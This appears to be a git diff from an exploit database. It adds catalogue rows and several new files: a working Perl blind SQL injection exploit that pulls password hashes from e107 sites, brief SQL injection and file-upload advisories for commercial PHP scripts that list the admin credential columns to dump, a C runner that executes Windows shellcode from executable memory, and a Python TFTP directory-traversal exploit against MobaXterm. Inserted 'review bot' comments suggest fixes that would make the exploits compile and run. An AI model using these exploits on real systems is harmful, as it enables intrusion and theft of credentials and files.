diff --git a/files.csv b/files.csv
index 9d4e2f338..6c7a98050 100644
--- a/files.csv
+++ b/files.csv
@@ -15313,6 +15313,7 @@ id,file,description,date,author,platform,type,port
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
+41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15938,6 +15939,7 @@ id,file,description,date,author,platform,type,port
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37493,3 +37495,15 @@ id,file,description,date,author,platform,type,port
 41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
 41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
 41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
+41580,platforms/php/webapps/41580.pl,"e107 <= 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps,0
+41582,platforms/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41583,platforms/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41584,platforms/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps,0
+41585,platforms/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41593,platforms/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41586,platforms/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41580.pl b/platforms/php/webapps/41580.pl
new file mode 100755
index 000000000..b4899c1eb
--- /dev/null
+++ b/platforms/php/webapps/41580.pl
@@ -0,0 +1,265 @@ +#!/usr/bin/perl +# +# +# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit +# +# -------------------------------------------------------------------------- +# [*] Discovered by staker - staker[at]hotmail[dot]it +# [*] Discovered on 09/03/2017 +# [*] Site Vendor: http://www.e107.org +# [*] BUG: Blind SQL Injection +# -------------------------------------------------------------------------- +# +# +# Description +# ------------------------------------------------------------------------- +# e107 contains one flaw that allows an attacker to carry out an SQL +# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script +# not properly saniting user-supplied input to the "keyword" POST variable +# This may allow an attacker to inject or manipulate sql queries in +# the backend database regardless of php.ini settings +# ------------------------------------------------------------------------- +# SHORT EXPLANATION +# ----------------------------------- +# +# FILE: "e107_handlers/core_functions.php" +# +# 76. function vartrue(&$val, $default='') +# 77. { +# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database +# 79. return $default; +# 80.} +# +# ---------------------------------- +# +# FILE: "e107/e107_plugins/pm/pm.php" +# +# +# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function. +# 36. { +# 37. pm_user_lookup(); +# 38.} +# +# +# +# 615. function pm_user_lookup() +# 616. { +# 617. $sql = e107::getDb(); +# 618. +# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized +# 620. if($sql->gen($query)) +# 621. { +# 622. echo '['; +# 623 while($row = $sql->fetch()) +# 624. { +# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}"; +# 626. } +# 627. +# 628. echo implode(",",$u); +# 629. 
echo ']'; +# ----------------------------------- +# +# +# use your brain.. +# +# Greetz to: Warwolfz Crew, +# meh, Dante90, SHADES MASTER and nexen +# +# -- 0gay -- +# +# ----------------------------------- +# YOUR MOM IS NOT SAFE ANYMORE!! +# CALL HER!! +# ----------------------------------- + + + +use strict; +use IO::Socket::INET; +use LWP::UserAgent; + + + + +my ($URL,$uid) = @ARGV; +my @chars = (8..122); +my ($i,$ord,$hash) = (1,undef,undef); + + + + + +if (@ARGV != 2) { usage(); } + + +$URL = parse::URL($URL); + + +syswrite (STDOUT,"[-] Crypted Password: "); + + +for ($i=0;$i<=60;$i++) +{ + + foreach $ord (@chars) + { + + if (e107::Query(sql($i,$ord),$URL) == 666 ) + { + syswrite (STDOUT,chr($ord)); + $hash .= chr($ord); + last; + } + if ($i == 2 and not defined $hash) + { + syswrite (STDOUT,"\n[-] Exploit Failed"); + exit; + } + } +} + + + +if (length($hash) == 60) { + die "\[-]Exploit Successfully"; +} +else { + die "\n[-] Exploit Failed"; +} + + + + + +sub e107::Query +{ + + # 1st parameter, sql query + # 2nd parameter, e107 website + + my ($query,$URL) = @_; + my $response = undef; + + my $lwp = new LWP::UserAgent; + + + $lwp->default_header('User-Agent' => 'Lynx (textmode)'); + + $response = $lwp->post($URL."/pm/", + [ + keyword => $query + ]) or die $!; + + + if ($response->content =~ /caption/) { + return 666; + } + else { + return 0; + } + +} + + +sub parse::URL +{ + my $string = shift @_ || die($!); + + if ($string !~ /^http:\/\/?/i) { + $string = 'http://'.$string; + } + + return $string; + } + + + +sub sql +{ + + # 1st parameter, an e107's userid + # 2nd parameter substring number + # 3rd parameter charcode number + + my ($i,$j,$sql) = (shift,shift,undef); + + $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#"; + + return $sql; +} + + + + + +sub e107::Cookies +{ + + my ($username,$password) = @_; + my ($packet,$content); + + my $host = "127.0.0.1"; # Valid Host (insert it manually) + my 
$path = "/e107/"; # Valid e107 path (insert it manually) + + + my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In"; + + + my $socket = new IO::Socket::INET( + PeerAddr => $host, + PeerPort => 80, + Proto => 'tcp', + ) or die $!; + + + + $packet .= "POST ".$path."/login.php HTTP/1.1\r\n"; + $packet .= "Host: ".$host."\r\n"; + $packet .= "User-Agent: Lynx (textmode)\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length:".length($data)."\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $packet.= $data; + + + $socket->send($packet); + + while (<$socket>) { + $content .= $_; + } + + + if ($content =~ /Set-Cookie: (.+?)/) { + return $1; + } + else { + die("[-] Login Failed..\n"); + } + + + # This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit. + # it works without log-in, but if you got some trouble, try to use this one. + + # e107::Login('YOUR USERNAME','YOUR PASSWORD'); +} + + +sub usage() { + + print "[*---------------------------------------------------------*]\n". + "[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n". + "[*---------------------------------------------------------*]\n". + "[* Usage: perl web.pl [host] [uid] *]\n". + "[* *]\n". + "[* Options: *]\n". + "[* [host] insert a valid host *]\n". + "[* [uid] insert a userid *]\n". + "[*---------------------------------------------------------*]\n"; + exit; + +} + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/41582.txt b/platforms/php/webapps/41582.txt new file mode 100755 index 000000000..c9d7bc5de --- /dev/null +++ b/platforms/php/webapps/41582.txt 
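Review bot: The trailing comment in `e107::Cookies` tells the reader to call `e107::Login('YOUR USERNAME','YOUR PASSWORD')`, but no sub by that name exists in the file; the helper is declared as `sub e107::Cookies`, so either the comment should read `# e107::Cookies('YOUR USERNAME','YOUR PASSWORD');` or the sub should be renamed to match. That comment also sits below an `if`/`else` whose branches both `return` or `die`, so it reads as dead text; moving the "not needed for this exploit" caveat above the sub's signature would make it visible where a reader first meets the helper. `usage()` names the script `web.pl` while the file is committed as `41580.pl`, which will confuse anyone copying the usage line. The success path ends in `die "\[-]Exploit Successfully"`, which writes to STDERR and exits non-zero; `print` followed by `exit 0` would report success as success.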
@@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Domain Marketplace Script - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: http://scripteen.com/ +# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html +# Demo: http://dwm.domainauctionsscript.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL] +# users :userId +# users :data +# users :payment_date +# users :expiration_date +# users :username +# users :password +# users :nume +# users :adresa +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41583.txt b/platforms/php/webapps/41583.txt new file mode 100755 index 000000000..01be6922d --- /dev/null +++ b/platforms/php/webapps/41583.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Global In – A LinkedIn Clone - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.techbizstudio.com/ +# Software: https://www.techbizstudio.com/product/linkedin-clone/ +# Demo: https://www.techbizstudio.com/demo/globalin/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL] +# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user] +# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user] +# tb_admin :id +# tb_admin :username +# tb_admin :email +# tb_admin :password +# tb_admin :ip_address +# tb_admin :is_active +# Etc.. +# # # # # \ No newline at end of file 
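Review bot: None of the advisory files added in this commit (41582 through 41593) records whether the vendor was contacted or whether a fixed version exists; each `# # # # #` header stops at `Version:` and `Tested on:`. A `Vendor Notified:` and `Fix Status:` pair in that header block would let readers of the database judge their exposure without cross-referencing vendor sites. The same template gap applies to 41583, 41584, 41585, 41586, 41587, 41588, 41589, 41590, 41591 and 41593, so it is worth fixing once in the template rather than per file.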
diff --git a/platforms/php/webapps/41584.txt b/platforms/php/webapps/41584.txt new file mode 100755 index 000000000..d626dc0c7 --- /dev/null +++ b/platforms/php/webapps/41584.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Global In - Arbitrary File Upload +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.techbizstudio.com/ +# Software: https://www.techbizstudio.com/product/linkedin-clone/ +# Demo: https://www.techbizstudio.com/demo/globalin/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# Exploit : +# Login as regular user +# http://localhost/[PATH]/dashboard +# Upload Photo / File.php +# http://localhost/[PATH]/post-images/1113330455_File.php +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41585.txt b/platforms/php/webapps/41585.txt new file mode 100755 index 000000000..e3abcaa54 --- /dev/null +++ b/platforms/php/webapps/41585.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Vanelo – Wanelo Clone - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.zoplay.com/ +# Software: https://www.zoplay.com/web/trending-marketplace-website/ +# Demo: http://wanelo.zoplay.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL] +# Duplicate entry 'waneloclone +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41586.txt b/platforms/php/webapps/41586.txt new file mode 100755 index 000000000..4369ed284 --- /dev/null +++ b/platforms/php/webapps/41586.txt 
@@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Pet Listing Script v3.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/pet-listing-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1 +# Version: 3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41587.txt b/platforms/php/webapps/41587.txt new file mode 100755 index 000000000..06ae642c7 --- /dev/null +++ b/platforms/php/webapps/41587.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Property Listing Script v3.1 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/property-listing-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1 +# Version: 3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41588.txt b/platforms/php/webapps/41588.txt new file mode 100755 index 000000000..6007c2c73 --- /dev/null +++ b/platforms/php/webapps/41588.txt 
@@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Travel Tours Script v2.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/travel-tours-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1 +# Version: 2.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41589.txt b/platforms/php/webapps/41589.txt new file mode 100755 index 000000000..fe6c4aa5e --- /dev/null +++ b/platforms/php/webapps/41589.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Yacht Listing Script v2.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/yacht-listing-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1 +# Version: 2.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL] +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41590.txt b/platforms/php/webapps/41590.txt new file mode 100755 index 000000000..d83c15cd5 --- /dev/null +++ b/platforms/php/webapps/41590.txt 
@@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Yellow Pages Script v3.2 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/yellow-pages-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1 +# Version: 3.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL] +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41591.txt b/platforms/php/webapps/41591.txt new file mode 100755 index 000000000..1d628714c --- /dev/null +++ b/platforms/php/webapps/41591.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: PHP Forum Script v3.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/php-forum-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1 +# Version: 3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41593.txt b/platforms/php/webapps/41593.txt new file mode 100755 index 000000000..ad993b2ad --- /dev/null +++ b/platforms/php/webapps/41593.txt 
@@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Mirage – Fancy Clone - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.zoplay.com/ +# Software: https://www.zoplay.com/web/multi-vendor-clone-website/ +# Demo: http://fancyclone.zoplay.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL] +# Duplicate entry 'fancyclone +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41581.c b/platforms/win_x86/shellcode/41581.c new file mode 100755 index 000000000..21eb47eed --- /dev/null +++ b/platforms/win_x86/shellcode/41581.c 
@@ -0,0 +1,113 @@ +/* + +MIT License + +Copyright (c) 2017 Ege Balcı + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + + +# Win32 - Hide Console Window Shellcode (182 BYTES) +# Date: [11.03.2017] +# Author: [Ege Balcı] +# Tested on: [Win XP/Vista/7/8/8.1/10] + +@egeblc + +------------------------------------------------------------------ + +This shellcode will hide the console window... + +[BITS 32] +[ORG 0] + + +pushad ; Save all register to stack +pushfd ; Save all flags to stack +cld +call Start +%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project + +Start: + pop ebp ; Pop the address of SFHA + + push 0x00000000 ; Push the byte 'user32' ,0,0 + push 0x00003233 ; ... + push 0x72657375 ; ... + push esp ; Push a pointer to the "user32" string on the stack. 
+ push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "user32" ) + add esp,0x0C ; Clear the stack + + push 0xCE726E89 ; hash("user32.dll", "GetConsoleWindow") + call ebp ; GetConsoleWindow(); + + push 0x00000000 ; 0 + push eax ; Console window handle + push 0x6E2EEBC2 ; hash(User32.dll, ShowWindow) + call ebp ; ShowWindow(HANDLE,SW_HIDE); + + popfd ; Pop back all saved flags + popad ; Pop back all saved registers + ret ; Return + +*/ +#include +#include + +unsigned char Shellcode[] = { + 0x60, 0x9c, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, + 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, + 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, + 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, + 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, + 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, + 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, + 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, + 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, + 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, + 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, + 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x00, 0x68, 0x33, 0x32, + 0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x68, 0x4c, 0x77, 0x26, + 0x07, 0xff, 0xd5, 0x83, 0xc4, 0x0c, 0x68, 0x89, 0x6e, 0x72, 0xce, 0xff, + 0xd5, 0x6a, 0x00, 0x50, 0x68, 0xc2, 0xeb, 0x2e, 0x6e, 0xff, 0xd5, 0x9d, + 0x61, 0xc3 +}; + + + +void ExecuteShellcode(); + + +int main(int argc, char const *argv[]) +{ + ExecuteShellcode(); + getchar(); + return 0; +} + + +void ExecuteShellcode(){ + char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(BUFFER, Shellcode, sizeof(Shellcode)); + (*(void(*)())BUFFER)(); +} + + 
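Review bot: The two `#include` directives before `Shellcode[]` name no header at all, so the file as committed does not compile; presumably the angle-bracketed names were lost in transit, and the symbols the code uses (`VirtualAlloc`, `MEM_COMMIT`, `PAGE_EXECUTE_READWRITE`, `getchar`, `memcpy`) would need `#include <windows.h>`, `#include <stdio.h>` and `#include <string.h>`. In `ExecuteShellcode` the pointer returned by `VirtualAlloc` is passed straight to `memcpy` without a null check, so an allocation failure turns into a write through a null pointer; `if (BUFFER == NULL) return;` before the copy closes that. The forward declaration `void ExecuteShellcode();` is an old-style empty parameter list; `void ExecuteShellcode(void);` states the contract explicitly and matches the definition.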
diff --git a/platforms/windows/remote/41592.txt b/platforms/windows/remote/41592.txt
new file mode 100755
index 000000000..f32b8947e
--- /dev/null
+++ b/platforms/windows/remote/41592.txt
@@ -0,0 +1,125 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt +[+] ISR: ApparitionSec + + + +Vendor: +===================== +mobaxterm.mobatek.net + + + +Product: +=============================== +MobaXterm Personal Edition v9.4 + +Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more. + + + +Vulnerability Type: +===================================== +Path Traversal Remote File Disclosure + + + + +CVE Reference: +============== +CVE-2017-6805 + + + +Security Issue: +================ +Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using +directory traversal attacks e.g. ../../../../Windows/system.ini + +Start MobaXterm TFTP server which listens on default TFTP port 69. + +c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini +Transfer successful: 219 bytes in 1 second(s), 219 bytes/s + +c:\xampp\htdocs>type system.ini +; for 16-bit app support +[386Enh] +woafont=dosapp.fon +EGA80WOA.FON=EGA80WOA.FON +EGA40WOA.FON=EGA40WOA.FON +CGA80WOA.FON=CGA80WOA.FON +CGA40WOA.FON=CGA40WOA.FON + +[drivers] +wave=mmdrv.dll +timer=timer.drv + +[mci] + +Victim Data located on: 127.0.0.1 + + + +POC URL: +============================= +https://vimeo.com/207516364 + + + + +Exploit: +========== + +import sys,socket + +print 'MobaXterm TFTP Directory Traversal 0day Exploit' +print 'Read Windows/system.ini' +print 'hyp3rlinx \n' + +HOST = raw_input("[IP]>") +FILE = 'Windows/system.ini' +PORT = 69 + +PAYLOAD = "\x00\x01" #TFTP Read +PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal +PAYLOAD += "netascii\x00" #TFTP Type + +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +s.sendto(PAYLOAD, (HOST, PORT)) +out = s.recv(1024) +s.close() + +print "Victim Data located on : %s " %(HOST) +print 
out.strip() + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: No Reply +March 10, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file
